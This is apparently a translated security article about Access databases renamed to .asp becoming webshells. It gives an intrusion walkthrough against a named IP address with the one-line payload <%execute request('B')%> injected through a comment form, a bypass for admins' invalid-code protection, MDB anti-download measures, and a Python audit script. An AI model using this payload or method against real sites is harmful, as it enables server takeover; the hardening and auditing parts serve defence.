The dangers of renaming an Access MDB to ASP, and MDB anti-download methods

Source: Internet
Author: User
Leaving aside the fact that a database whose suffix has simply been changed can still be downloaded directly with a download manager and similar tools, changing the suffix actually opens the door to intruders: an intruder can use a database with an .asp/.asa suffix to obtain a webshell directly.

I. The idea

We all know that <% %> is the ASP script delimiter: the ASP engine only executes the code between <% and %>. In an Access+ASP web system all data is stored in the database file (the MDB file). Once the administrator has renamed the MDB file to an ASP file, any submitted data that contains <% %> is executed as code when the ASP-suffixed database is requested. So it is enough to submit malicious code into the database, and the ASP-suffixed database becomes a webshell.

II. Example

Pick a target at random. First we trigger a database-path disclosure error to see whether the database has an ASP suffix: http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210


Return:

Microsoft VBScript Compiler error ' 800A03F6 '
Missing ' End '

/iishelp/common/500-100.asp, Line 242

Microsoft JET Database Engine error ' 80004005 '

' D:\log_mdb\%29dlog_mdb%29.asp ' is not a valid path. Determine if the path name is spelled correctly, and whether to connect to the server where the file is stored.

/test/conn.asp, Line 18


We request http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp, which returns a pile of garbled characters, so the database could be downloaded directly with a download manager and similar tools (not discussed here). Back on the home page we see that a "User Comments" feature is available. We register a user and post a comment:

<%execute request ("B")%>

This writes the ASP code <%execute request ("B")%> into the database, so the database is now our webshell. Requesting http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp again, at the end of the garbled output we see:


/iishelp/common/500-100.asp, Line 242
Microsoft VBScript run-time error ' 800a000d '

Type mismatch: ' Execute '

/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266


Note: When we submit code to the database, the code content cannot be too large. So we use <%execute request ("B")%>.

III. Some other questions and ideas

1. Some administrators, besides changing the suffix to ASP, also add invalid ASP code such as <%= ' a ' -1%> to the database in order to completely prevent it from being downloaded. Because the invalid ASP code is there, requesting the file after our webshell code has been inserted only shows the error from the earlier invalid code and does not execute our shell code. Although this stops some attacks, a hidden risk remains: by adding error-tolerant code ahead of the failing code, the inserted webshell code can still be made to execute.

2. Where the suffix has not been changed, that is, the file is still an MDB, it can simply be downloaded to obtain the back-end (admin) password. Once logged in to the back end, the database backup feature can be used to change the suffix to ASP.

Summary of MDB anti-download methods

1. Under IIS 6, if an extension is not defined, requesting a file with that extension returns a 404 Not Found error.
So you can give the database an arbitrary name with an extension that never otherwise occurs and get the protective effect, for example: xxxxx.xxxxxxxxxxx


2. Put the database outside the site directory, where it cannot be reached by a web request at all. For example, if e:/web/ is your website,
then put the database in e:/

3. As mentioned above, rename the .mdb to .asp and import a special table containing the binary characters <%, so that requesting the file produces an error about a missing script closing tag.
4. Alternatively, rename the .mdb to .asp and open it with WinHex: after 176 there is a very long run of 00 bytes. Replacing part of that run with a piece of ASP code also prevents downloading and does not affect database functionality. For example:
<%
Response.Write ("Illegal access")
Response.End ()
%>


Adding "#" or spaces to the database name has by now been defeated as well, for example "#" = "<%35" and space = "<%20".

So it's no use doing that now.


If it's your own server, set it up in IIS:

Create a new, blank DLL file, then add an application mapping in IIS: select the DLL you just created, enter .mdb as the extension, and restart the IIS service after saving.
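
An audit for the risk described in section I and the storage rules summarised above, as an added example that is not part of the original article: it walks a web root, recognises Access databases by their file header rather than by name, and reports which ones sit under a script-mapped extension and contain `<%`. The script-mapped extension set, the function names and the sample tree are assumptions constructed for the example.

```python
import os
import tempfile

# Jet 3/4 (.mdb) and ACE (.accdb) files carry one of these markers at offset 4.
JET_MAGICS = (b"Standard Jet DB", b"Standard ACE DB")
# Assumption: extensions this server hands to the ASP script engine.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}

def is_access_db(data):
    """Identify an Access database by content, ignoring its file name."""
    return any(data[4:4 + len(m)] == m for m in JET_MAGICS)

def audit_webroot(webroot):
    """Return one finding per Access database stored under webroot."""
    findings = []
    for folder, _dirs, files in os.walk(webroot):
        for name in sorted(files):
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if not is_access_db(data):
                continue
            ext = os.path.splitext(name)[1].lower()
            findings.append({
                "file": os.path.relpath(path, webroot),
                "script_mapped": ext in SCRIPT_EXTS,  # engine will parse it
                "asp_open_tags": data.count(b"<%"),   # literal "<%" bytes
            })
    return findings

def build_sample_site():
    """Constructed sample tree: two fake Jet files and one ordinary page."""
    root = tempfile.mkdtemp()
    header = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    samples = {
        "data/site.mdb": header + b"plain rows",
        "data/site_db.asp": header + b"comment: <%placeholder%> from a user",
        "index.asp": b"<% Response.Write(\"hello\") %>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for finding in audit_webroot(build_sample_site()):
        print(finding)
```

Any finding means a database is stored inside the web root, whatever its name. A script-mapped file with a nonzero `asp_open_tags` count means stored data is being parsed as script when the file is requested.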